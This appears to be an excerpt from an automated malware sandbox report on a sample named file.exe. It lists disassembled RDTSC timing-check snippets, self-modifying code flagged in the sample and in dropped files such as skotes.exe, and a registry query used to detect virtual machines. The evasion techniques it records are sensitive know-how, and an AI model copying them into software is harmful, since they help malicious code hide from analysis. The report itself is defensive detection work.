00007FE0491DA10Bh 0x0000005e test eax, eax 0x00000060 pushad 0x00000061 push eax 0x00000062 mov dx, 3736h 0x00000066 pop edi 0x00000067 push eax 0x00000068 push edx 0x00000069 movzx ecx, dx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0DF3 second address: 53C0E5D instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FE0BA868401h 0x0000000e jmp 00007FE048D058A1h 0x00000013 mov ecx, eax 0x00000015 jmp 00007FE048D0589Eh 0x0000001a xor eax, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e mov esi, ebx 0x00000020 mov edx, 6147751Eh 0x00000025 popad 0x00000026 and ecx, 1Fh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007FE048D058A1h 0x00000032 and ax, DCA6h 0x00000037 jmp 00007FE048D058A1h 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0E5D second address: 53C0E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0E67 second address: 53C0E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0E6B second address: 53C0ECA instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ror eax, cl 0x00000009 jmp 00007FE0491DA112h 0x0000000e leave 0x0000000f jmp 00007FE0491DA110h 0x00000014 retn 0004h 0x00000017 nop 0x00000018 mov esi, eax 0x0000001a lea eax, dword ptr [ebp-08h] 0x0000001d xor esi, dword ptr [00A52014h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push eax 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a call 00007FE04DB8AEE0h 0x0000002f push FFFFFFFEh 0x00000031 jmp 00007FE0491DA110h 0x00000036 pop eax 0x00000037 pushad 0x00000038 mov edx, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FE0491DA118h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0ECA second address: 53C0F16 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FE04D6B66A2h 0x00000010 mov edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE048D058A6h 0x0000001b jmp 00007FE048D058A5h 0x00000020 popfd 0x00000021 jmp 00007FE048D058A0h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0F16 second address: 53C0F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C0F1C second address: 53C0F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380012 second address: 538003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA116h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538003E second address: 5380042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380042 second address: 5380048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380048 second address: 5380070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 mov bh, 06h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380070 second address: 5380082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0491DA10Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380082 second address: 5380086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380086 second address: 53800F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c push ecx 0x0000000d pushfd 0x0000000e jmp 00007FE0491DA115h 0x00000013 sbb cx, 4656h 0x00000018 jmp 00007FE0491DA111h 0x0000001d popfd 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov dword ptr [esp], ecx 0x00000023 jmp 00007FE0491DA117h 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE0491DA115h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53800F4 second address: 5380133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE048D0589Ah 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov di, cx 0x00000011 pushfd 0x00000012 jmp 00007FE048D0589Ah 0x00000017 or ecx, 19E09538h 0x0000001d jmp 00007FE048D0589Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push ebx 0x00000029 pop eax 0x0000002a mov dx, B5B2h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380133 second address: 5380191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007FE0491DA110h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 jmp 00007FE0491DA10Eh 0x00000018 call 00007FE0491DA112h 0x0000001d movzx esi, bx 0x00000020 pop ebx 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov dh, AAh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380191 second address: 5380195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380195 second address: 53801D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b jmp 00007FE0491DA110h 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 jmp 00007FE0491DA110h 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801D5 second address: 53801D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801D9 second address: 53801F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801F6 second address: 53802BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1F580442h 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ecx, 33C619C1h 0x00000014 mov cl, 90h 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FE048D058A9h 0x0000001d test esi, esi 0x0000001f jmp 00007FE048D0589Eh 0x00000024 je 00007FE0BA8A3C74h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FE048D0589Eh 0x00000031 add ah, 00000068h 0x00000034 jmp 00007FE048D0589Bh 0x00000039 popfd 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 jmp 00007FE048D058A5h 0x00000047 je 00007FE0BA8A3C48h 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007FE048D058A3h 0x00000056 sub ecx, 16F2B80Eh 0x0000005c jmp 00007FE048D058A9h 0x00000061 popfd 0x00000062 mov bx, cx 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53802BA second address: 5380302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FE0491DA10Fh 0x0000000c add ah, 0000001Eh 0x0000000f jmp 00007FE0491DA119h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edx, dword ptr [esi+44h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE0491DA10Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380302 second address: 5380320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dx, ax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380320 second address: 5380379 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test edx, 61000000h 0x0000000e jmp 00007FE0491DA10Ch 0x00000013 jne 00007FE0BAD78454h 0x00000019 pushad 0x0000001a mov eax, 317DD7FDh 0x0000001f pushfd 0x00000020 jmp 00007FE0491DA10Ah 0x00000025 adc al, FFFFFFD8h 0x00000028 jmp 00007FE0491DA10Bh 0x0000002d popfd 0x0000002e popad 0x0000002f test byte ptr [esi+48h], 00000001h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE0491DA110h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380379 second address: 538037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538037D second address: 5380383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380383 second address: 5380389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380389 second address: 53803D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE0BAD78400h 0x00000011 pushad 0x00000012 push esi 0x00000013 mov bl, 1Fh 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007FE0491DA115h 0x0000001c mov ecx, 6DDC2237h 0x00000021 popad 0x00000022 popad 0x00000023 test bl, 00000007h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803D7 second address: 53803F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FE048D058A5h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707A9 second address: 53707B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0491DA10Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707B9 second address: 53707BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707BD second address: 53707D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 21682A0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707D0 second address: 53707D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707D5 second address: 5370868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0491DA10Eh 0x00000013 jmp 00007FE0491DA115h 0x00000018 popfd 0x00000019 mov esi, 338F5C07h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 call 00007FE0491DA118h 0x00000027 call 00007FE0491DA112h 0x0000002c pop eax 0x0000002d pop edx 0x0000002e mov edi, eax 0x00000030 popad 0x00000031 and esp, FFFFFFF8h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FE0491DA119h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370868 second address: 5370889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 5F0E9D42h 0x00000008 push edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE048D058A1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370889 second address: 5370899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0491DA10Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370899 second address: 53708DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D0589Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e jmp 00007FE048D058A6h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE048D058A7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53708DD second address: 537093C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE0491DA10Fh 0x00000009 and si, A45Eh 0x0000000e jmp 00007FE0491DA119h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FE0491DA110h 0x0000001a sbb ecx, 72C3C858h 0x00000020 jmp 00007FE0491DA10Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537093C second address: 5370940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370940 second address: 5370952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370952 second address: 5370958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370958 second address: 537095C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537095C second address: 537096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537096B second address: 537096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537096F second address: 5370975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370975 second address: 53709F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0491DA10Ch 0x00000013 adc ax, 6C48h 0x00000018 jmp 00007FE0491DA10Bh 0x0000001d popfd 0x0000001e mov ecx, 233A97BFh 0x00000023 popad 0x00000024 sub ebx, ebx 0x00000026 pushad 0x00000027 movsx edx, cx 0x0000002a mov ebx, eax 0x0000002c popad 0x0000002d test esi, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007FE0491DA111h 0x00000037 pop esi 0x00000038 pushfd 0x00000039 jmp 00007FE0491DA111h 0x0000003e or ax, F2C6h 0x00000043 jmp 00007FE0491DA111h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53709F8 second address: 5370A2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FE0BA8AB221h 0x00000011 jmp 00007FE048D058A4h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov esi, 1CA9C44Fh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A2D second address: 5370A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A33 second address: 5370A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A37 second address: 5370A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007FE0491DA113h 0x0000000f je 00007FE0BAD7FA55h 0x00000015 pushad 0x00000016 movzx esi, dx 0x00000019 movsx edx, si 0x0000001c popad 0x0000001d test byte ptr [76FA6968h], 00000002h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov edi, eax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A6F second address: 5370A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A75 second address: 5370A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A79 second address: 5370A9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE0BA8AB1CBh 0x0000000e jmp 00007FE048D0589Bh 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A9A second address: 5370A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370A9E second address: 5370AF7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 9482h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b mov eax, 5763D60Bh 0x00000010 movzx esi, dx 0x00000013 popad 0x00000014 mov dword ptr [esp], ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007FE048D058A4h 0x0000001f pop eax 0x00000020 pushfd 0x00000021 jmp 00007FE048D0589Bh 0x00000026 adc ah, FFFFFFDEh 0x00000029 jmp 00007FE048D058A9h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370AF7 second address: 5370B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FE0491DA114h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE0491DA10Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B28 second address: 5370B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE048D058A7h 0x0000000b sub eax, 3840A4FEh 0x00000011 jmp 00007FE048D058A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B6F second address: 5370B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B73 second address: 5370B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B79 second address: 5370BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA112h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE0491DA10Eh 0x00000013 sbb cx, EE58h 0x00000018 jmp 00007FE0491DA10Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f push esi 0x00000020 pop edx 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 popad 0x00000025 push dword ptr [ebp+10h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BC3 second address: 5370BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BC7 second address: 5370BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BCB second address: 5370BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BD1 second address: 5370BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BD7 second address: 5370BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C2E second address: 5370C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA10Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b jmp 00007FE0491DA114h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380CC3 second address: 5380CFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FE048D0589Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx esi, bx 0x00000019 popad 0x0000001a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A5E9B3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C08251 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C2DFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C9181E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CE9B3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 278251 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 29DFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 30181E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Special instruction interceptor: First address: 854FE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Special instruction interceptor: First address: 85490E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Special instruction interceptor: First address: 8547FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Special instruction interceptor: First address: A0D463 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Special instruction interceptor: First address: A87885 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
